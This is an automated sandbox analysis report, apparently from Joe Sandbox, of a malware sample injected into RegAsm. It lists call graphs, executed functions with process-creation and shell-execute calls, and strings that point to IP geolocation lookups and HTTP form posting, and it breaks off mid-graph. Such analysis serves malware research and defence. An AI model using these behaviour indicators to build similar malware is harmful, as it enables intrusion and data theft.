62482->62485 62484 441af0 58 API calls 62483->62484 62491 47e714 Concurrency::wait 62484->62491 62486 47e405 Concurrency::wait 62485->62486 62487 414e70 std::ios_base::clear 46 API calls 62486->62487 62488 47e42f Concurrency::wait 62487->62488 62490 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62488->62490 62489 47eb2b Concurrency::wait 62493 41a1e0 std::ios_base::clear 46 API calls 62489->62493 62492 47e446 62490->62492 62491->62489 62494 41a1e0 std::ios_base::clear 46 API calls 62491->62494 62495 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62492->62495 62496 47ec6a 62493->62496 62497 47e893 62494->62497 62500 47e451 62495->62500 62498 441af0 58 API calls 62496->62498 62499 4f7b50 46 API calls 62497->62499 62513 47ec76 Concurrency::wait 62498->62513 62501 47e8f3 Concurrency::wait 62499->62501 62502 4186f0 46 API calls 62500->62502 62504 414e70 std::ios_base::clear 46 API calls 62501->62504 62503 47e4f6 62502->62503 62505 4400a0 98 API calls 62503->62505 62506 47e91d Concurrency::wait 62504->62506 62521 47e505 62505->62521 62510 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62506->62510 62507 47e5e6 62509 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62507->62509 62508 47f0bc Concurrency::wait 62517 41a1e0 std::ios_base::clear 46 API calls 62508->62517 62511 47e5f1 62509->62511 62512 47e934 62510->62512 62514 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62511->62514 62515 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62512->62515 62513->62508 62516 41a1e0 std::ios_base::clear 46 API calls 62513->62516 62514->62478 62526 47e93f 62515->62526 62518 47ee19 62516->62518 62519 47f1fb 62517->62519 62527 4f7b50 46 API calls 62518->62527 62523 441af0 58 API calls 62519->62523 62520 47e592 62522 4150c0 std::bad_exception::bad_exception 46 API calls 62520->62522 62521->62507 62521->62520 62524 47e5b0 62522->62524 62547 47f207 Concurrency::wait 62523->62547 62525 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62524->62525 62529 47e5bb 62525->62529 62530 4186f0 46 API calls 62526->62530 62528 47ee79 Concurrency::wait 62527->62528 62534 414e70 std::ios_base::clear 46 API calls 62528->62534 62531 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62529->62531 62532 47ea08 62530->62532 62533 47e5c6 62531->62533 62535 4400a0 98 API calls 62532->62535 62536 4f12c0 43 API calls 62533->62536 62537 47eea3 Concurrency::wait 62534->62537 62553 47ea17 62535->62553 62538 47e5d1 62536->62538 62544 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62537->62544 62540 4f12c0 43 API calls 62538->62540 62539 47eb15 62543 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62539->62543 62541 47e5d9 62540->62541 62542 47f658 __aulldiv _memcpy_s __vswprintf_s_l 62551 414fd0 std::ios_base::clear 46 API calls 62542->62551 62545 47eb20 62543->62545 62546 47eeba 62544->62546 62548 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62545->62548 62549 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62546->62549 62547->62542 62550 41a1e0 std::ios_base::clear 46 API calls 62547->62550 62548->62489 62558 47eec5 62549->62558 62554 47f3aa 62550->62554 62573 47f7b4 62551->62573 62552 47eab3 62555 4150c0 std::bad_exception::bad_exception 46 API calls 62552->62555 62553->62539 62553->62552 62557 4f7b50 46 API calls 62554->62557 62556 47ead4 62555->62556 62559 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62556->62559 62561 47f40a Concurrency::wait 62557->62561 62563 4186f0 46 API calls 62558->62563 62560 47eadf 62559->62560 62562 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62560->62562 62568 414e70 std::ios_base::clear 46 API calls 62561->62568 62564 47eaea 62562->62564 62565 47ef8e 62563->62565 62566 4f12c0 43 API calls 62564->62566 62567 4400a0 98 API calls 62565->62567 62569 47eaf5 62566->62569 62588 47ef9d 62567->62588 62570 47f434 Concurrency::wait 62568->62570 62571 4f12c0 43 API calls 62569->62571 62578 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62570->62578 62574 47eb00 62571->62574 62572 47f0a6 62576 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62572->62576 62575 47f966 62573->62575 62582 414fd0 std::ios_base::clear 46 API calls 62573->62582 62577 4f12c0 43 API calls 62574->62577 62581 4186f0 46 API calls 62575->62581 62579 47f0b1 62576->62579 62577->62541 62580 47f44b 62578->62580 62583 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62579->62583 62584 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62580->62584 62585 47fa30 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 62581->62585 62586 47f943 62582->62586 62583->62508 62596 47f456 62584->62596 62594 42b840 2 API calls 62585->62594 62587 414e70 std::ios_base::clear 46 API calls 62586->62587 62590 47f95b 62587->62590 62588->62572 62589 47f039 62588->62589 62591 4150c0 std::bad_exception::bad_exception 46 API calls 62589->62591 62592 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62590->62592 62593 47f05a 62591->62593 62592->62575 62595 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62593->62595 62603 47fa44 62594->62603 62598 47f065 62595->62598 62600 4186f0 46 API calls 62596->62600 62597 47fc50 62601 414fd0 std::ios_base::clear 46 API calls 62597->62601 62599 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62598->62599 62602 47f070 62599->62602 62604 47f51f 62600->62604 62605 47fc5d 62601->62605 62606 4f12c0 43 API calls 62602->62606 62603->62597 62613 4186f0 46 API calls 62603->62613 62607 4400a0 98 API calls 62604->62607 62608 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62605->62608 62609 47f07b 62606->62609 62631 47f52e 62607->62631 62610 47fc68 62608->62610 62611 4f12c0 43 API calls 62609->62611 62614 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62610->62614 62615 47f086 62611->62615 62612 47f642 62618 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62612->62618 62616 47fb18 62613->62616 62617 47fc73 62614->62617 62620 4f12c0 43 API calls 62615->62620 62621 4400a0 98 API calls 62616->62621 62622 4f12c0 43 API calls 62617->62622 62619 47f64d 62618->62619 62623 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62619->62623 62624 47f091 62620->62624 62641 47fb27 62621->62641 62625 47fc7e 62622->62625 62623->62542 62627 4f12c0 43 API calls 62624->62627 62626 4f12c0 43 API calls 62625->62626 62629 47fc89 62626->62629 62627->62541 62628 47fc45 62630 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62628->62630 62633 4f12c0 43 API calls 62629->62633 62630->62597 62631->62612 62632 47f5ca 62631->62632 62634 4150c0 std::bad_exception::bad_exception 46 API calls 62632->62634 62635 47fc94 62633->62635 62636 47f5eb 62634->62636 62637 4f12c0 43 API calls 62635->62637 62638 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62636->62638 62642 47fc9f 62637->62642 62639 47f5f6 62638->62639 62643 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62639->62643 62640 47fbc5 62644 4150c0 std::bad_exception::bad_exception 46 API calls 62640->62644 62641->62628 62641->62640 62645 4f12c0 43 API calls 62642->62645 62646 47f601 62643->62646 62647 47fbe6 62644->62647 62645->62541 62648 4f12c0 43 API calls 62646->62648 62649 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62647->62649 62650 47f60c 62648->62650 62651 47fbf1 62649->62651 62652 4f12c0 43 API calls 62650->62652 62653 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62651->62653 62654 47f617 62652->62654 62655 47fbfc 62653->62655 62656 4f12c0 43 API calls 62654->62656 62657 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62655->62657 62658 47f622 62656->62658 62659 47fc07 62657->62659 62660 4f12c0 43 API calls 62658->62660 62661 4f12c0 43 API calls 62659->62661 62662 47f62d 62660->62662 62663 47fc12 62661->62663 62664 4f12c0 43 API calls 62662->62664 62665 4f12c0 43 API calls 62663->62665 62664->62541 62666 47fc1d 62665->62666 62667 4f12c0 43 API calls 62666->62667 62668 47fc28 62667->62668 62669 4f12c0 43 API calls 62668->62669 62670 47fc33 62669->62670 62671 4f12c0 43 API calls 62670->62671 62671->62541 62672 4ed7b0 62673 4f4620 46 API calls 62672->62673 62674 4ed7c3 62673->62674 62675 43761c 62676 437623 Concurrency::wait 62675->62676 62676->62676 62677 41a1e0 std::ios_base::clear 46 API calls 62676->62677 62678 43769b 62677->62678 62679 53e01e std::_Facet_Register 17 API calls 62678->62679 62680 4376a5 Concurrency::wait 62679->62680 62681 4f4e30 46 API calls 62680->62681 62682 43776f Concurrency::wait 62681->62682 62682->62682 62683 41a1e0 std::ios_base::clear 46 API calls 62682->62683 62684 4377e9 62683->62684 62685 4187e0 46 API calls 62684->62685 62686 4378b4 62685->62686 62687 508d80 70 API calls 62686->62687 62688 4378c6 62687->62688 62689 438a4e 62688->62689 62903 4f39a0 59 API calls 62688->62903 62690 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62689->62690 62693 438a59 62690->62693 62692 438a2f 62923 4f0610 46 API calls 3 library calls 62692->62923 62694 438c97 62693->62694 62700 438cbe Concurrency::wait 62693->62700 62696 438cab 62694->62696 62697 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62694->62697 62698 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62696->62698 62697->62696 62842 438cb6 62698->62842 62699 437911 62699->62692 62904 4f37b0 46 API calls 3 library calls 62699->62904 62700->62700 62702 41a1e0 std::ios_base::clear 46 API calls 62700->62702 62703 438d36 62702->62703 62704 53e01e std::_Facet_Register 17 API calls 62703->62704 62707 438d40 Concurrency::wait 62704->62707 62705 437a3c 62705->62692 62905 4f37b0 46 API calls 3 library calls 62705->62905 62708 4f4e30 46 API calls 62707->62708 62711 438e07 Concurrency::wait 62708->62711 62709 437b3e 62906 4f37b0 46 API calls 3 library calls 62709->62906 62711->62711 62712 41a1e0 std::ios_base::clear 46 API calls 62711->62712 62715 438e81 62712->62715 62713 437e8b 62910 4f37b0 46 API calls 3 library calls 62713->62910 62714 437c12 62714->62713 62907 4f37b0 46 API calls 3 library calls 62714->62907 62718 4187e0 46 API calls 62715->62718 62719 438f4c 62718->62719 62721 508d80 70 API calls 62719->62721 62720 437f57 62911 4f37b0 46 API calls 3 library calls 62720->62911 62723 438f5e 62721->62723 62722 437d14 62908 4f37b0 46 API calls 3 library calls 62722->62908 62725 439983 62723->62725 62924 4f39a0 59 API calls 62723->62924 62727 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62725->62727 62733 43998e 62727->62733 62729 43802b 62912 4f37b0 46 API calls 3 library calls 62729->62912 62731 437de8 Concurrency::wait 62909 506060 46 API calls __Getctype 62731->62909 62732 439964 62938 4f0610 46 API calls 3 library calls 62732->62938 62734 439bf3 62733->62734 62735 439bcc 62733->62735 62739 414fd0 std::ios_base::clear 46 API calls 62734->62739 62738 439be0 62735->62738 62741 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62735->62741 62742 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62738->62742 62744 439c0a 62739->62744 62740 437e3a 62746 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62740->62746 62747 437e48 Concurrency::wait 62740->62747 62741->62738 62742->62842 62743 438109 62743->62692 62913 4f37b0 46 API calls 3 library calls 62743->62913 62745 53e01e std::_Facet_Register 17 API calls 62744->62745 62753 439c14 62745->62753 62746->62747 62748 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62747->62748 62748->62713 62749 438fa9 62749->62732 62925 4f37b0 46 API calls 3 library calls 62749->62925 62752 43820b 62914 4f37b0 46 API calls 3 library calls 62752->62914 62939 4edf90 46 API calls 62753->62939 62756 439d0d 62757 414fd0 std::ios_base::clear 46 API calls 62756->62757 62759 439d1c 62757->62759 62758 4390ca 62758->62732 62926 4f37b0 46 API calls 3 library calls 62758->62926 62761 414fd0 std::ios_base::clear 46 API calls 62759->62761 62760 4382df 62859 4389bc 62760->62859 62915 4f37b0 46 API calls 3 library calls 62760->62915 62763 439d37 62761->62763 62765 508d80 70 API calls 62763->62765 62764 438a18 62764->62692 62769 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62764->62769 62767 439d46 62765->62767 62770 43a157 62767->62770 62940 4f39a0 59 API calls 62767->62940 62769->62692 62771 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62770->62771 62778 43a162 62771->62778 62772 4391c2 62927 4f37b0 46 API calls 3 library calls 62772->62927 62775 4383e1 62916 4f37b0 46 API calls 3 library calls 62775->62916 62776 43a138 62949 4f0610 46 API calls 3 library calls 62776->62949 62781 414fd0 std::ios_base::clear 46 API calls 62778->62781 62780 4384b5 62917 4f37b0 46 API calls 3 library calls 62780->62917 62786 43a3a2 62781->62786 62782 439d86 62782->62776 62941 4f37b0 46 API calls 3 library calls 62782->62941 62784 439296 62785 43948e 62784->62785 62928 4f37b0 46 API calls 3 library calls 62784->62928 62932 4f37b0 46 API calls 3 library calls 62785->62932 62788 414fd0 std::ios_base::clear 46 API calls 62786->62788 62791 43a463 62788->62791 62792 432db0 92 API calls 62791->62792 62826 43a46f Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 62792->62826 62793 439e88 62793->62776 62942 4f37b0 46 API calls 3 library calls 62793->62942 62794 43938e 62929 4f37b0 46 API calls 3 library calls 62794->62929 62795 439550 62933 4f37b0 46 API calls 3 library calls 62795->62933 62799 439462 62930 4f3a70 46 API calls 62799->62930 62800 439f61 62943 4f3a70 46 API calls 62800->62943 62801 438593 Concurrency::wait 62809 41a1e0 std::ios_base::clear 46 API calls 62801->62809 62801->62859 62804 43947a 62931 41b3b0 43 API calls 2 library calls 62804->62931 62805 439f79 62944 41b3b0 43 API calls 2 library calls 62805->62944 62808 43a642 62811 43b13a 62808->62811 62816 414fd0 std::ios_base::clear 46 API calls 62808->62816 62813 4386fe 62809->62813 62810 439483 62815 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62810->62815 62814 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62811->62814 62812 439f85 62817 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62812->62817 62918 506140 46 API calls 62813->62918 62820 43b145 62814->62820 62815->62785 62821 43a66b 62816->62821 62822 439f90 62817->62822 62819 439624 62819->62732 62934 4f37b0 46 API calls 3 library calls 62819->62934 62824 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62820->62824 62825 53e01e std::_Facet_Register 17 API calls 62821->62825 62945 4f37b0 46 API calls 3 library calls 62822->62945 62823 438730 62919 4f37b0 46 API calls 3 library calls 62823->62919 62834 43b150 62824->62834 62862 43a675 __aulldiv __vswprintf_s_l 62825->62862 62826->62808 62950 42ae90 55 API calls 4 library calls 62826->62950 62831 43a628 62951 41b3b0 43 API calls 2 library calls 62831->62951 62833 43b3a5 62839 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62833->62839 62834->62833 62838 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62834->62838 62835 43a033 62835->62776 62946 4f37b0 46 API calls 3 library calls 62835->62946 62836 438803 62920 4f37b0 46 API calls 3 library calls 62836->62920 62837 43a637 62841 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62837->62841 62838->62833 62839->62842 62840 43994d 62840->62732 62846 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62840->62846 62841->62808 62845 43971c 62849 414fd0 std::ios_base::clear 46 API calls 62845->62849 62863 4398f1 62845->62863 62846->62732 62848 4388d7 62921 4f37b0 46 API calls 3 library calls 62848->62921 62851 439818 62849->62851 62850 43a10c 62947 4f3a70 46 API calls 62850->62947 62935 4f38a0 46 API calls 62851->62935 62853 43a124 62948 41b3b0 43 API calls 2 library calls 62853->62948 62857 43a12d 62858 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 62857->62858 62858->62776 62859->62764 62922 4f0610 46 API calls 3 library calls 62859->62922 62860 439824 62936 4f37b0 46 API calls 3 library calls 62860->62936 62952 4edf90 46 API calls 62862->62952 62863->62840 62937 4f0610 46 API calls 3 library calls 62863->62937 62865 43a9f0 62866 414fd0 std::ios_base::clear 46 API calls 62865->62866 62867 43a9ff 62866->62867 62868 4187e0 46 API calls 62867->62868 62869 43aa22 62868->62869 62870 508d80 70 API calls 62869->62870 62871 43aa3e 62870->62871 62903->62699 62904->62705 62905->62709 62906->62714 62907->62722 62908->62731 62909->62740 62910->62720 62911->62729 62912->62743 62913->62752 62914->62760 62915->62775 62916->62780 62917->62801 62918->62823 62919->62836 62920->62848 62921->62859 62922->62764 62923->62689 62924->62749 62925->62758 62926->62772 62927->62784 62928->62794 62929->62799 62930->62804 62931->62810 62932->62795 62933->62819 62934->62845 62935->62860 62936->62863 62937->62840 62938->62725 62939->62756 62940->62782 62941->62793 62942->62800 62943->62805 62944->62812 62945->62835 62946->62850 62947->62853 62948->62857 62949->62770 62950->62831 62951->62837 62952->62865 62965 5533ea 62966 5533f6 ___unDNameEx 62965->62966 62967 553412 62966->62967 62968 5533fd 62966->62968 62978 54f8d3 EnterCriticalSection 62967->62978 62990 54e121 14 API calls __dosmaperr 62968->62990 62971 55341c 62979 5532f6 62971->62979 62972 553402 62991 55303c 43 API calls _memcpy_s 62972->62991 62976 55340d 62978->62971 62980 55330e 62979->62980 62983 55337e 62979->62983 62981 55c123 __fread_nolock 43 API calls 62980->62981 62982 553314 62981->62982 62982->62983 62986 553366 62982->62986 62985 553376 62983->62985 62993 55d329 62983->62993 62992 553455 LeaveCriticalSection __fread_nolock 62985->62992 62998 54e121 14 API calls __dosmaperr 62986->62998 62988 55336b 62999 55303c 43 API calls _memcpy_s 62988->62999 62990->62972 62991->62976 62992->62976 62994 55c286 __dosmaperr 14 API calls 62993->62994 62995 55d346 62994->62995 62996 55a5ce ___std_exception_copy 14 API calls 62995->62996 62997 55d350 62996->62997 62997->62985 62998->62988 62999->62985

                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                            Function 004CE2E0 Relevance: 75.8, APIs: 16, Strings: 26, Instructions: 2340sleepprocessCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 004CE503
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                              • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 004CE63D
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000C8,?,?,?), ref: 004CEF31
                                                                                                                                                                                                                                            • Sleep.KERNEL32(?), ref: 004CEF5A
                                                                                                                                                                                                                                            • GetBinaryTypeA.KERNEL32(00000000,FFFFFFFF), ref: 004CEF84
                                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,?,?,00000000,00000000,?), ref: 004CF440
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 004CF451
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 004CF45E
                                                                                                                                                                                                                                            • GetBinaryTypeA.KERNEL32(?,FFFFFFFF,?), ref: 004CF680
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000000C8), ref: 004CF87D
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 004CF8A6
                                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,00000000,?,?,00000000,00000000,?), ref: 004CFD69
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004CFD7A
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 004CFD87
                                                                                                                                                                                                                                            • __aulldiv.LIBCMT ref: 004D06D7
                                                                                                                                                                                                                                            • ShellExecuteA.SHELL32(00000000,?,?,?,00000000,?), ref: 004D087C
                                                                                                                                                                                                                                              • Part of subcall function 0053E35A: AcquireSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E365
                                                                                                                                                                                                                                              • Part of subcall function 0053E35A: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,-00007535,?,004308C5,00590F6C,?,0000000A,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 0053E39F
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: AcquireSRWLockExclusive.KERNEL32(0058E970,-00007535,?,004308F2,00590F6C), ref: 0053E313
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: ReleaseSRWLockExclusive.KERNEL32(0058E970,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E346
                                                                                                                                                                                                                                              • Part of subcall function 0053E309: WakeAllConditionVariable.KERNEL32(0058E96C,?,004308F2,00590F6C,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 0053E351
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv$CloseExclusiveHandleLockSleep$AcquireBinaryCreateProcessReleaseType$ConditionExecuteShellVariableWake
                                                                                                                                                                                                                                            • String ID: %$+aii$9$;$<SLYR$>$C$Cao$D$D$F$Lb( $U$U$U$[$[$]$^$^$eks$j3l6lrek$n{$w$y$}{
                                                                                                                                                                                                                                            • API String ID: 469071346-2654065059
                                                                                                                                                                                                                                            • Opcode ID: c39aeffa4eb96d726e9a602af5bd39a87696cf3c6120f5ecdc6016e16a3d3a64
                                                                                                                                                                                                                                            • Instruction ID: 7417cdd4d66c97faec94657393e268677ea1e608b421e5d19b18f6df23a6c79a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c39aeffa4eb96d726e9a602af5bd39a87696cf3c6120f5ecdc6016e16a3d3a64
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B24356B0D042688FDB65CB24CC94BEEBBB1BF49304F0481EAD54967281DB386E88CF55
                                                                                                                                                                                                                                            Function 00436CA0 Relevance: 48.8, APIs: 2, Strings: 24, Instructions: 3321COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: $JEIA$%LU$/$/F_$1RR$;UZV^$?[^K^$?[^K^$@$Content-Type: application/x-www-form-urlencoded$E!$1$$L(-8-$`$bgrg$f$g$g$https://ipgeolocation.io/$https://ipinfo.io/$lcog$n{$n{$o$s
                                                                                                                                                                                                                                            • API String ID: 0-4202864799
                                                                                                                                                                                                                                            • Opcode ID: 9b168f86c9ea5ff03f3431b00f9dc6910dd09f1fc6848eb7831cf0d10d18a3bd
                                                                                                                                                                                                                                            • Instruction ID: 009e3aa1f1fbc12fea8c265774fa31fbb15222e88e55ed6fae987f700cd50bcc
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b168f86c9ea5ff03f3431b00f9dc6910dd09f1fc6848eb7831cf0d10d18a3bd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD83F3B0D092688BDB25CB28CC94BEEBBB1AF49304F0481DAD54D67242CB796F85CF55
                                                                                                                                                                                                                                            Function 00450910 Relevance: 46.2, APIs: 2, Strings: 23, Instructions: 2466COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __aulldiv
                                                                                                                                                                                                                                            • String ID: %$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:::$n{$n{
                                                                                                                                                                                                                                            • API String ID: 3732870572-4140743676
                                                                                                                                                                                                                                            • Opcode ID: ee82034eb941f7fe57dde0fc0f87107847c513c562f249ed86d053bc1710683d
                                                                                                                                                                                                                                            • Instruction ID: 1cdd653370803adc6f3131d0949a08e463757fa1663f0c5e8cee9cedd3fbe819
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee82034eb941f7fe57dde0fc0f87107847c513c562f249ed86d053bc1710683d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 89433870D042688BCB25DB64CC90BEEBBB5AF45309F0441DED54AAB242DB346F88CF59
                                                                                                                                                                                                                                            Function 004309A0 Relevance: 39.7, APIs: 13, Strings: 9, Instructions: 1186COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 2466 4309a0-4309cd call 41b910 2469 4309d0-4309e0 2466->2469 2469->2469 2470 4309e2-430b2d call 41a1e0 call 566450 call 566330 call 414fd0 2469->2470 2479 430b64-430b6c call 41bb40 2470->2479 2480 430b2f-430b36 2470->2480 2484 430b71-430b78 2479->2484 2482 430b41 2480->2482 2483 430b38-430b3f 2480->2483 2485 430b48-430b4e 2482->2485 2483->2485 2486 430b83 2484->2486 2487 430b7a-430b81 2484->2487 2485->2479 2488 430b50-430b62 call 414e70 2485->2488 2489 430b8a-430b90 2486->2489 2487->2489 2488->2484 2491 430b92-430bac call 4ee3c0 2489->2491 2492 430bea-430c11 call 417140 2489->2492 2498 430bb2-430bc2 2491->2498 2499 430c1c-430c20 2492->2499 2498->2498 2502 430bc4-430be5 call 4172e0 2498->2502 2500 430c22-430c57 2499->2500 2501 430c59-430ca8 call 414d00 call 54e93c 2499->2501 2500->2499 2509 430cae-430e9f call 566450 * 2 call 41fb00 call 566450 call 566330 call 566450 * 2 call 41fb00 call 54f2dd 2501->2509 2510 43146c-431483 call 417140 * 2 2501->2510 2502->2492 2533 430ea4-430f57 call 566450 * 3 call 566330 call 41fbd0 2509->2533 2519 431a30-431a36 2510->2519 2544 430f67-430f8a call 54ea78 call 417140 * 2 2533->2544 2545 430f59-430f65 2533->2545 2544->2519 2545->2544 2546 430f8f-43122b call 566450 * 2 call 41fb00 call 566450 * 3 call 566330 call 41fbd0 call 54edcb call 54e81e call 566450 call 566330 call 566450 * 2 call 41fb00 call 54edcb 2545->2546 2585 43123b-431247 call 41bba0 2546->2585 2586 43122d-431239 call 41bb40 2546->2586 2589 43124c-4313ae call 566450 call 566330 call 414d00 call 54f2dd 2585->2589 2586->2589 2599 4313b0-4313c4 call 53e35a 2589->2599 2600 4313ea-431402 2589->2600 2599->2600 2609 4313c6-4313e7 call 41f450 call 53e28a call 53e309 2599->2609 2601 431454-431459 call 4ed870 2600->2601 2602 431404-431452 call 4fa560 call 4f4970 2600->2602 2608 43145e-43165c call 54ea78 call 414e10 call 566450 * 2 call 41fb00 call 414e10 call 4ee4c0 call 566450 * 3 call 566330 call 41fbd0 call 566450 * 2 call 41fb00 2601->2608 2602->2608 2650 431662-431673 call 414d50 2608->2650 2651 4317c0-43181f call 566450 * 2 call 41fb00 2608->2651 2609->2600 2656 431675-431684 call 414d50 2650->2656 2657 431689-43169b call 414d50 2650->2657 2669 43182a-431830 2651->2669 2665 4317bb 2656->2665 2666 4316b1-4316c3 call 414d50 2657->2666 2667 43169d-4316ac call 414d50 2657->2667 2677 